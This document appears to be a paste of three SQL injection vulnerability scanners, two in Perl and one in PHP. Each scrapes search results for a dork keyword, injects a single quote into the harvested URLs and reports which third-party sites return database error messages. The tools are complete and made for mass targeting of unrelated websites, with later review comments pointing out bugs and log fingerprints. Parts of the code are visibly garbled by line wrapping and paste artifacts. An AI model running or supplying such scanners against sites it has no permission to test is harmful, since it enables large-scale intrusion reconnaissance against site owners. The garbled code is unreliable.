#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www1.r00tw0rm.com/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
# Parse -k (search keyword / "dork"), -p (number of result pages) and -o (accepted
# but never read below) into the package global %opts. The script has no
# `use strict`/`use warnings`, so every variable used below is an implicit global.
getopt('kpo', \%opts);
# Prints usage when -k is missing but does NOT exit: the search loop still runs
# with an empty keyword.
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
# Default to a single result page when -p is absent.
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
# Banner. The heredoc is interpolating (double-quoted terminator), so the doubled
# backslashes on the last two lines print as single ones; nothing else is special.
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\\
\\_/
Metropolis_intro
# Windows cmd.exe-only console colour; the return value is not checked, so on
# other platforms this is silently ineffective apart from whatever the shell prints.
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
# One Google result page (10 links) per iteration, -p pages in total. The test is
# `!=` rather than `<`, so a -p value that is not a positive multiple of 1 (e.g.
# negative, or "2.5") never satisfies the stop condition and the loop does not end.
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
# The raw keyword is concatenated into the query string without URL-encoding.
$t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".
$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
# Hard-coded browser User-Agent for the search requests. NOTE(review): the literal
# appears wrapped across two lines on this page; as printed it embeds a newline
# inside the header value. Either way the exact string is a usable fingerprint in
# web-server and proxy logs.
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12)
Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
# Crude link extraction: split the result HTML on every `<a href=` and keep what
# precedes ` class=l` in each fragment (presumably the result-link markup at the
# time of the version date above; not validated against anything newer).
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
# Greedy (.*) with /i and /g in scalar context; $1 is read on the very next line.
# Everything up to the LAST ` class=l` in the fragment becomes the URL.
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
# The only probe this scanner sends: a single quote appended to the harvested URL.
$out =~s/$/\'/;
# Fresh UA object with no agent() call, so the probe request goes out with LWP's
# default User-Agent rather than the browser string used for the search above —
# a second, distinct log fingerprint.
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
# No is_success check here: a timeout or 4xx/5xx body is pattern-matched as well.
$error = $response->content();
# Classification is purely by DB error banner in the response body; any page that
# merely echoes such text is reported, so treat the output as a lead, not a finding.
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
# NOTE(review): the next two patterns appear wrapped across lines on this page; as
# printed each contains a literal newline, which the one-line banners would not match.
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft
Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error
=~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
# `()` is an empty capture group here, not literal parentheses, so these match the
# bare function names `mysql_fetch_array` / `mysql_num_rows`.
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}
perl2
#!/usr/bin/perl
# NOTE(review): on this page the entire script is collapsed onto one line, so
# everything after the shebang is swallowed by the `#!` comment and nothing runs.
# It is split back into statements here with no token changed.
# The script reads a search "dork" and a page count from STDIN, harvests links
# from Google result pages, appends a single quote to each linked URL and reports
# any response body that contains a database error banner.
# No `use strict`/`use warnings`; most variables below are implicit globals.
# LWP::Simple and HTTP::Request are loaded but never used.
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;

# Clear the console on the current platform (return values unchecked).
my $sis="$^O";
if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

print "+++++++++++++++++++++++++++++++\n";
print "+ SQL - Google Search +\n";
print "+ CWH Underground +\n";
print "+++++++++++++++++++++++++++++++\n\n";

# Both inputs are used as-is: the dork is not URL-encoded, and the page count is
# not checked to be a positive integer (non-numeric input makes the loop below
# never start, a negative value makes it never stop).
print "Insert Dork:";
chomp( my $dork = <STDIN> );
print "Total Query Pages (10 Links/Pages) :";
chomp( my $page = <STDIN> );
print "\n * Result:\n\n";

# One Google result page (10 links) per iteration.
for($start = 0;$start != $page*10;$start += 10) {
    $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
    # Fixed User-Agent 'Mozilla 5.2' on every request this script makes — a
    # simple fingerprint for server-log searches.
    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($t);
    if ($response->is_success) {
        $c = $response->content;
        # Crude link extraction: split on `<a href=` and keep what precedes
        # ` class=l` in each fragment (greedy, so up to the last such marker).
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff) {
            if($line =~/(.*) class=l/ig) {
                $out = $1;
                $out =~ s/\"//g;
                # The only probe sent: a single quote appended to the URL.
                $out =~s/$/\'/;
                $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
                $ua->timeout(10);
                $ua->env_proxy;
                $response = $ua->get($out);
                # No is_success check: timeouts and error pages are matched too.
                $error = $response->content();
                # Signature matching on the response body only. The MySQL branch
                # fires on any `mysql_` substring or any `Warning:` text, so it
                # is very prone to false positives.
                if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/) {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
                elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/) {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
                elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/) {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
                elsif($error =~m/Microsoft OLE DB Provider for Oracle/) {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
            }
        }
    }
}
php
- <php
- <html>
- <head>
- <title>m0bil3_xT's SQLi Scanner</title>
- <center><img src="http://i.imgur.com/lH3GO.png">
- </center>
- </head>
- <body bgcolor=#000000>
- <style>
- body{
- font: 10pt Verdana;
- }
- tr {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- color: #ff9900;
- }
- td {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- color: #2BA8EC;
- font: 10pt Verdana;
- }
- table {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: #111;
- }
- input {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: Black;
- font: 10pt Verdana;
- color: #ff9900;
- }
- input.submit {
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #FFFFFF;
- border-color: #009900;
- }
- code {
- border : dashed 0px #333;
- BACKGROUND-COLOR: Black;
- font: 10pt Verdana bold;
- color: while;
- }
- run {
- border : dashed 0px #333;
- font: 10pt Verdana bold;
- color: #FF00AA;
- }
- textarea {
- BORDER-RIGHT: #3e3e3e 1px solid;
- BORDER-TOP: #3e3e3e 1px solid;
- BORDER-LEFT: #3e3e3e 1px solid;
- BORDER-BOTTOM: #3e3e3e 1px solid;
- BACKGROUND-COLOR: #1b1b1b;
- font: Fixedsys bold;
- color: #aaa;
- }
- A:link {
- COLOR: #2BA8EC; TEXT-DECORATION: none
- }
- A:visited {
- COLOR: #2BA8EC; TEXT-DECORATION: none
- }
- A:hover {
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #ff9900; TEXT-DECORATION: none
- }
- A:active {
- color: Red; TEXT-DECORATION: none
- }
- .listdir tr:hover{
- background: #444;
- }
- .listdir tr:hover td{
- background: #444;
- text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
- color: #FFFFFF; TEXT-DECORATION: none;
- }
- .notline{
- background: #111;
- }
- .line{
- background: #222;
- }
- </style>
- <center>
- <br/>
- <?php
- // Page body: prints the banner, the visitor/server IPs and the dork form, then
- // (on POST) runs the scan inline and streams results with ob_flush()/flush().
- // NOTE(review): every line on this page carries a leading "- " that looks like
- // a rendering artifact rather than part of the file; it is left untouched here.
- echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
- 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
- rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
- size='5'></font></b><br><br><center><a href='
- target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
- 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
- font-weight:bold;' size='2'></font><br><br></center>";
- $your_ip = $_SERVER['REMOTE_ADDR'];
- echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
- size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
- font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
- // HTTP_HOST is taken from the client's Host header. The @ hides lookup errors,
- // and gethostbyname() returns its argument unchanged when the name does not
- // resolve, so an arbitrary Host value ends up echoed below without escaping
- // (a reflected-XSS sink on this page itself).
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
- size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
- font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
- // Form posts back to this same script (action="") with fields "dork" and "scan".
- echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
- value="" name="dork" size="20"/><input type="submit" name="scan"
- value="Scan"></form></center>';
- // Output buffering plus no execution time limit: a scan can run indefinitely.
- ob_start();
- set_time_limit(0);
- if (isset($_POST['scan'])) {
- // Intended to forward the visitor's User-Agent, but both curl_setopt() calls
- // below pass the SINGLE-quoted literal '$browser)', so the outbound requests
- // carry the literal string "$browser)" as their User-Agent. That string is a
- // precise fingerprint of this tool in web-server logs; $browser itself is unused.
- $browser = $_SERVER['HTTP_USER_AGENT'];
- // Search front-end used to harvest candidate URLs (no scheme given; curl is
- // left to infer one) and the regex that pulls href values out of its results.
- $first = "startgoogle.startpagina.nl/index.php?q=";
- $sec = "&start=";
- $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
- // Hard-coded 31 result pages (offsets 0..300) per scan.
- for($id=0 ; $id<=30; $id++){
- $page=$id*10;
- // The dork is URL-encoded; $_POST['dork'] is not checked for presence.
- $dork=urlencode($_POST['dork']);
- $url = $first.$dork.$sec.$page;
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- $result = curl_exec($curl);
- curl_close($curl);
- // Greedy (.*) in $reg: on a line with several matching anchors the capture runs
- // to the last one. $matches[1] holds the raw, unvalidated hrefs.
- preg_match_all($reg,$result,$matches);
- foreach($matches[1] as $site){
- // The only probe sent: a single quote inserted after EVERY "=" in the URL.
- $url = preg_replace("/=/", "='", $site);
- // This inner handle is never curl_close()d, so one handle leaks per harvested URL.
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- curl_setopt($curl,CURLOPT_TIMEOUT,'5');
- // curl_exec() returns false on failure; preg_match() then sees "" and the URL
- // is reported as "Not Vuln" rather than as an error.
- $GET=curl_exec($curl);
- // Body-only signature match. NOTE(review): the pattern appears wrapped across
- // lines on this page and one alternative ("mysql_fetch_row") seems to contain
- // an invisible character; the unescaped "()" are empty groups, not literal
- // parentheses. Several alternatives ("Syntax error", "Fatal error") are generic
- // enough to flag unrelated error pages.
- if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
- query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row
- ()|SELECT *
- FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
- // $url originates from third-party HTML and is echoed into href and text
- // without htmlspecialchars(): a crafted search result can inject markup into
- // the operator's own results page.
- echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
- target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
- Found..</font></b></center>';
- ob_flush();flush();
- }else{
- echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
- <-- Not Vuln</font></center>';
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ?>
- </body>
- </html>